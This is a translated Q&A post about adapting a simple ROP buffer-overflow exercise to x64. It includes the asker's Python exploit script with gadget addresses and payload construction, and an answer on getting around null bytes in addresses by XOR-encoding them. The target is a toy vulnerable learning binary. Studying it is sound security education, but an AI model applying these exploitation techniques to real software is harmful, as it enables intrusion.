ROP 漏洞利用:地址包含空字节

问题描述

我目前正在尝试将简单 ROP 攻击的 this example 改编为 x64。 相应地编译程序时:

gcc -O0 -g -static -fno-stack-protector -no-pie -o simple_rop64 ./simple_rop.c

并尝试调整函数的使用地址(使用 gdb)我遇到以下问题。例如,lazy() 函数的 x64 地址在 0x401b9d,它只有三个字节。因此,struct.pack 将添加一个空字节。

python 解释器因此在执行时会抛出错误消息:

python rop_exploit.py 
[...]
os.system("./simple_rop64 \"%s\"" % payload)
TypeError: system() argument 1 must be string without null bytes,not str

是否可以将这个函数地址(总是只有三个字节)用于这个易受攻击的程序?还是我必须调整它?

感谢您的帮助。

这里是我调整的python脚本

    #Find gadgets

#objdump -d simple_rop64 | grep --color -E -A2 "pop +%rbp"
#47c54a:    5d                      pop    %rbp
#47c54b:    c3                      retq 
pop_ret = 0x47c54a # start address of a pop,ret sequence

#objdump -d simple_rop32 | grep --color -A2 8049ca4
#8049ca4:   5f                      pop    %edi
#8049ca5:   5d                      pop    %ebp
#8049ca6:   c3                      ret 
pop_pop_ret = 0x8049ca4 # start address of a pop,pop,ret sequence

lazy = 0x401b9d # objdump -d | grep lazy
food = 0x401bb0 # objdump -d | grep food
feeling_sick = 0x401c0c # objdump -d | grep feeling_sick

#Buffer Overflow
#0x0000000000401d0d <+45>:  lea    -0x70(%rbp),%rax
payload = "A"*0x70
# Saved RBP register
payload += "BBBBBBBB"

#food(0xdeadbeef) gadget
payload += struct.pack("I",food)
payload += struct.pack("I",pop_ret)
payload += struct.pack("I",0xdeadbeef)

#feeling_sick(0xd15ea5e,0x0badf00d) gadget
payload += struct.pack("I",feeling_sick)
payload += struct.pack("I",pop_pop_ret)
payload += struct.pack("I",0xd15ea5e)
payload += struct.pack("I",0x0badf00d)

payload += struct.pack("I",lazy)

os.system("./simple_rop64 \"%s\"" % payload)

解决方法

You can't。相反,您可以做的是找到一个小工具,该小工具执行特定操作并在您的漏洞利用中执行相反的操作。

例如,如果您找到一个执行 xor eax,0xFFFFFFFF 的小工具,那么您可以将您的地址与它 (0x401b9d ^ 0xFFFFFFFF = 0xFFBFE462) 进行异或,使其适合 4 个字节。 pop 将此中间值转化为 eax 并调用您的小工具,以便您的中间值成为您想要的地址。然后你跳到它。